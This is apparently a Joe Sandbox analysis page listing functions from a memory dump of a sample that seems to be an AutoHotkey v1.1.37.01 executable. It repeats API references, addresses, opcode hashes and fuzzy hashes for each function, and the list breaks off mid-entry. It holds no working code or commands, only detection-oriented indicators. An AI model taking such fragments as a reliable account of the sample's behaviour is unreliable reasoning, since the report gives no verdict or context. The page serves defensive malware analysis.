Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTickWindow$ClipboardCloseForegroundGlobalMessagePeekTextUnlockVisible
String ID:
API String ID: 1043259673-0
Opcode ID: 3561a395f7453b6d922c336265d213d02a22f6ec6122ff7eeed711209a91dd92
Instruction ID: 03e9f91fc1672be58f95bce4c5fc7039c38299a630fdfda19ae346819bd403f0
Opcode Fuzzy Hash: 3561a395f7453b6d922c336265d213d02a22f6ec6122ff7eeed711209a91dd92
Instruction Fuzzy Hash: DC917D32205B4486FB6B8B27E8847EA77A2F74DBE4F140116EB5947AF5DB38D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400376D3 Relevance: 10.7, APIs: 7, Instructions: 180windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
SHEmptyRecycleBinW.SHELL32 ref: 00000001400376EB

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseEmptyGlobalMessagePeekRecycleUnlock
String ID:
API String ID: 2387848762-0
Opcode ID: 33f3d304712845c1afa68b130bfebb76fe99d664ecd808039b146d3cf4242a3f
Instruction ID: 81d55c210eddb6dc3b25a59dd37d364ca035143a1b128d75b07052d20816b024
Opcode Fuzzy Hash: 33f3d304712845c1afa68b130bfebb76fe99d664ecd808039b146d3cf4242a3f
Instruction Fuzzy Hash: 6D917132605B4086FB6B8B27E8847EA77A1F74DBE4F544116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037829 Relevance: 10.7, APIs: 7, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140064EA0: GetFullPathNameW.KERNEL32(0000000140081547), ref: 0000000140064ECD
Part of subcall function 0000000140064EA0: GetFileAttributesW.KERNEL32 ref: 0000000140064EEF
Part of subcall function 0000000140064EA0: SetLastError.KERNEL32 ref: 0000000140064F01

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
GetLastError.KERNEL32 ref: 000000014003783B

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ErrorLast$AttributesClipboardCloseFileFullGlobalMessageNamePathPeekUnlock
String ID:
API String ID: 769837341-0
Opcode ID: 50cc4f34daf5e6e3b58d34c94f2aead68375eb41bb3ea415367a90325a519d6d
Instruction ID: 5016a245d3c179cf9ffcef6440128dc0a908d34a65de18e198cda55f051d710b
Opcode Fuzzy Hash: 50cc4f34daf5e6e3b58d34c94f2aead68375eb41bb3ea415367a90325a519d6d
Instruction Fuzzy Hash: 63915132205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB59876F5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036325 Relevance: 10.7, APIs: 7, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
SetEnvironmentVariableW.KERNEL32 ref: 0000000140036333

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseEnvironmentGlobalMessagePeekUnlockVariable
String ID:
API String ID: 2791281230-0
Opcode ID: c8ee9ecd6d6ac5a57429e8b7c7c20779b43bace1391c25cb45e5b660dafee915
Instruction ID: 50cdd63b04a12da761e673d40b121f40a12708a817ddb71bb5dbcbeb2cf54574
Opcode Fuzzy Hash: c8ee9ecd6d6ac5a57429e8b7c7c20779b43bace1391c25cb45e5b660dafee915
Instruction Fuzzy Hash: 85916F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400385F0 Relevance: 10.7, APIs: 7, Instructions: 167keyboardwindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
BlockInput.USER32 ref: 00000001400385F7

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$BlockClipboardCloseGlobalInputMessagePeekUnlock
String ID:
API String ID: 3677732381-0
Opcode ID: e64a08d68ada1e383ff7dfe411c7496ea38f033e45399501c4a8ebe04c7ba7bb
Instruction ID: 8c74c506dbfb04a2761e5ed3627728f1f00c9e1b6fcaa5f7a0226c373d782455
Opcode Fuzzy Hash: e64a08d68ada1e383ff7dfe411c7496ea38f033e45399501c4a8ebe04c7ba7bb
Instruction Fuzzy Hash: E2818132205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5A47AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038608 Relevance: 10.7, APIs: 7, Instructions: 167keyboardwindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
BlockInput.USER32 ref: 000000014003860A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$BlockClipboardCloseGlobalInputMessagePeekUnlock
String ID:
API String ID: 3677732381-0
Opcode ID: 098493fa739c6f1c6ce57146dafbbe3b7a12a3d02d133607d96dbf6f445f31f0
Instruction ID: babbc73a52a3977578806980d8ddcc74465ac63fef842476d766d94011948813
Opcode Fuzzy Hash: 098493fa739c6f1c6ce57146dafbbe3b7a12a3d02d133607d96dbf6f445f31f0
Instruction Fuzzy Hash: AB818232205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5947AF5CB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038A04 Relevance: 10.7, APIs: 7, Instructions: 166windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
OutputDebugStringW.KERNEL32 ref: 0000000140038A0B

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseDebugGlobalMessageOutputPeekStringUnlock
String ID:
API String ID: 1875564215-0
Opcode ID: 74dc71ebc4e63f97b1d0fe555a874af1444d90fb201e9d7649cbeffe7282d3c0
Instruction ID: 98cb3ab9328de7d70abe5b8ba7503a063b84ddbba0e4910451a98d462fa5416c
Opcode Fuzzy Hash: 74dc71ebc4e63f97b1d0fe555a874af1444d90fb201e9d7649cbeffe7282d3c0
Instruction Fuzzy Hash: 11817132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140003DD4 Relevance: 10.7, APIs: 7, Instructions: 158clipboardwindowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
CountClipboardFormats.USER32 ref: 0000000140003DD4
IsClipboardFormatAvailable.USER32 ref: 0000000140003DE3
IsClipboardFormatAvailable.USER32 ref: 0000000140003DF0

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Count$ClipboardTick$AvailableFormat$FormatsMessage
String ID:
API String ID: 3556998310-0
Opcode ID: ed7b69d913f97db6b630eb19b08abd11ed7f0658a162ffe8a2d595de231ab655
Instruction ID: ce760f6fcd84c781c025144108fd4be7885210cc41408ea2898013a3221c4e88
Opcode Fuzzy Hash: ed7b69d913f97db6b630eb19b08abd11ed7f0658a162ffe8a2d595de231ab655
Instruction Fuzzy Hash: 5D716C72204A808AFB67CF27F8407E937A5F78CB98F544129EB4A5B6B5DB34C881C750

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140003CF8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
free.LIBCMT ref: 0000000140003D9E

Strings

call, xrefs: 0000000140003D6D

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Messagefree
String ID: call
API String ID: 3699376206-3431870270
Opcode ID: 593eaa5b835cb017b1a2ca537513666172a2d7c725d4e00bf6f9924eda71177f
Instruction ID: 73d795f549d9ba6ce4d787e275223675034a792e880d6a287fdd2592e22c6698
Opcode Fuzzy Hash: 593eaa5b835cb017b1a2ca537513666172a2d7c725d4e00bf6f9924eda71177f
Instruction Fuzzy Hash: E77183B2104B809AE766CF26F8447E977A5F78CB98F544126FB4947AB5DB34C541CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D3224 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001400D3247
_errno.LIBCMT ref: 00000001400D324F

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: e2a816f3bda0864b16cb19fa9a83befb4879e065206f3371bbcaaada9374db41
Instruction ID: 5974b3b25d236b1efca06bae42c7a38c9b8969bac27403bfb6f7edfc5baef6fc
Opcode Fuzzy Hash: e2a816f3bda0864b16cb19fa9a83befb4879e065206f3371bbcaaada9374db41
Instruction Fuzzy Hash: 3C21F03271468086F62B6F27E8413FE7660AB8CBE1F494105BF150B3F2DBBC88428761

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000271F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64threadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.01,?,00000001400B5089), ref: 0000000140002A03
GetWindowThreadProcessId.USER32 ref: 0000000140002A1A
GetClassNameW.USER32 ref: 0000000140002A3C
IsDialogMessageW.USER32 ref: 0000000140002A7E
SetCurrentDirectoryW.KERNEL32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.01,?,00000001400B5089), ref: 0000000140002AAE

Strings

#32770, xrefs: 0000000140002A49

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Window$ClassCurrentDialogDirectoryForegroundMessageNameProcessThread
String ID: #32770
API String ID: 2633243691-463685578
Opcode ID: 55a5f12f70680434cd9c6846416b2dbd8e8b0409ab07550086e69759ef738f17
Instruction ID: 13e62cd1402b08ae7e1b290a156aad89562d73791a2084b2b46bcb8e2a0d146a
Opcode Fuzzy Hash: 55a5f12f70680434cd9c6846416b2dbd8e8b0409ab07550086e69759ef738f17
Instruction Fuzzy Hash: B13139B1205B8586FF67CB17E8543E427A0A74DBD4F180026EB0A2B7B4DF78D986C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032520 Relevance: 9.3, APIs: 6, Instructions: 310windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 8d74a98857db42192ab5d809668da4fa8fa1c9cc8c9bfb5057f4bdf62ed694d8
Instruction ID: 2098af272220fe9a817936dc927d8e5afffd6d4322b5c26a69d94b7877b1a529
Opcode Fuzzy Hash: 8d74a98857db42192ab5d809668da4fa8fa1c9cc8c9bfb5057f4bdf62ed694d8
Instruction Fuzzy Hash: 33E19E32604B8089E767CB26E8447EA37A5F74DBE4F154216EF8947BB4DB38C981C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140002E55 Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140003006
DragFinish.SHELL32 ref: 00000001400030D3

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountDragFinishTick
String ID:
API String ID: 1673030553-0
Opcode ID: dced1849271494bcbad8b6b02a4794bb067002d3a2bda61d2e9b8c38b6d98c32
Instruction ID: 73c39381ea34a135986d6729d1cf4b2b86e875d2fddc847d707355d7fa03974d
Opcode Fuzzy Hash: dced1849271494bcbad8b6b02a4794bb067002d3a2bda61d2e9b8c38b6d98c32
Instruction Fuzzy Hash: 64D17BB2205A818AFB67CB27B9543EA37A5F34DBD4F144226EB5A076F5CB34C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037349 Relevance: 9.3, APIs: 6, Instructions: 270windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 4b9b1ac82eac34430445c2309087bc685eefb6d24cca93d52ad6dff7770e3196
Instruction ID: 8473ee2b4758d647dc0a94ee3611e9cb53faf8b8a555fad58fe14e57367caa1f
Opcode Fuzzy Hash: 4b9b1ac82eac34430445c2309087bc685eefb6d24cca93d52ad6dff7770e3196
Instruction Fuzzy Hash: 6AC1C03160474086EB678B27A4907EA7792F78DBD0F544212FB5A4BBF5DB78D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037CC9 Relevance: 9.2, APIs: 6, Instructions: 234windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
